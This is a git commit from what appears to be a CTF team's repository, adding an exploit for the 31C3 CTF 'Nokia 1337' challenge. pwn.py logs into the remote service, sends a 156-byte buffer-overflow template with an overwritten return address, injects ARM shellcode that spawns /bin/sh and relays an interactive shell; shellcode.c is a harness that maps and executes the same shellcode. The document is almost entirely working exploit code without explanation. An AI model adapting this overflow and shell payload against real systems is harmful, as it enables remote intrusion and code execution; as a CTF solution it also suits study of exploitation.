31C3 CTF Nokia 1337

2014-12-30 16:49:05 +01:00 · 2014-12-30 16:49:05 +01:00 · 1dbe16aea8
commit 1dbe16aea8
2 changed files with 110 additions and 0 deletions
--- a/31c3/nokia/pwn.py
+++ b/31c3/nokia/pwn.py
@ -0,0 +1,71 @@
+import socket
+import gevent
+import gevent.server
+from gevent.socket import wait_read
+import sys
+
+
+# Uncomment for production
+#remote = ("188.40.18.78", 1025)
+remote = ("127.0.0.1", 10023)
+local = ("127.0.0.1", 10024)
+
+shellcode = "ZZZZ" + "01608fe216ff2fe178461230011e52408a600190029201a952400b2701df2f2f62696e2f736869696969".decode('hex')
+
+def waitk():
+    wait_read(sys.stdin.fileno())
+    return sys.stdin.read(1)
+
+def typein(s, text):
+    for t in text:
+        if t == '\xff':
+            t = '\xff\xff'
+        gevent.sleep(0.1)
+        s.send(t)
+
+def copier(src, dst):
+    while True:
+        d = src.recv(1024)
+        if len(d) == 0:
+            print "copier got 0..."
+            break
+        dst.sendall(d)
+
+def handle(client, address):
+    remote_socket = gevent.socket.socket()
+    remote_socket.connect(remote)
+
+    # Uncomment for production, after brute-forcing token
+    #print remote_socket.recv(1024)
+    #gevent.sleep(1)
+    #remote_socket.send('3573-1419883439.0-4a0ee4c7cbbe18cf39fd76348899c861\n')
+    #gevent.sleep(1)
+
+    gevent.spawn(copier, client, remote_socket)
+    gevent.spawn(copier, remote_socket, client)
+    gevent.sleep(1)
+    gevent.sleep(1)
+    typein(remote_socket, 'mobile\n')
+    gevent.sleep(1)
+    typein(remote_socket, 'mobile\n')
+    
+    print "create new template, press enter here..."
+    waitk()
+    print "sending template..."
+    typein(remote_socket, "A"*156 + "\x04\xc6\x01")
+
+    print "create new message, press enter here..."
+    waitk()
+    print "sending message...", len(shellcode)
+    print len(shellcode + "Z"*(56-len(shellcode)))
+    typein(remote_socket, shellcode + "Z"*(56-len(shellcode)))
+
+    print "press enter to get shell"
+    waitk()
+    while True:
+        c = waitk()
+        remote_socket.send(c)
+
+
+server = gevent.server.StreamServer(local, handle)
+server.serve_forever()
--- a/31c3/nokia/shellcode.c
+++ b/31c3/nokia/shellcode.c
@ -0,0 +1,39 @@
+#include <stdio.h>
+#include <stdio.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+
+unsigned char SC[] =  "\x01\x60\x8f\xe2"
+        "\x16\xff\x2f\xe1"
+        "\x78\x46"
+        "\x12\x30"
+        "\x01\x1e"
+        "\x52\x40"
+        "\x8a\x60"
+        "\x01\x90"
+        "\x02\x92"
+        "\x01\xa9"
+        "\x52\x40"
+        "\x0b\x27"
+        "\x01\xdf"
+        "\x2f\x2f"
+        "\x62\x69"
+        "\x6e\x2f"
+        "\x73\x68iiii";
+
+int main(void)
+{
+    void *ptr = mmap(0, sizeof(SC),PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+    memcpy(ptr, SC, sizeof(SC));
+    for (int i = 0; i < sizeof(SC); i++)
+    {
+        printf("%02x", SC[i]);
+    }   
+    printf("\n");
+
+    (*(void(*)()) ptr)();
+    return 0;
+
+}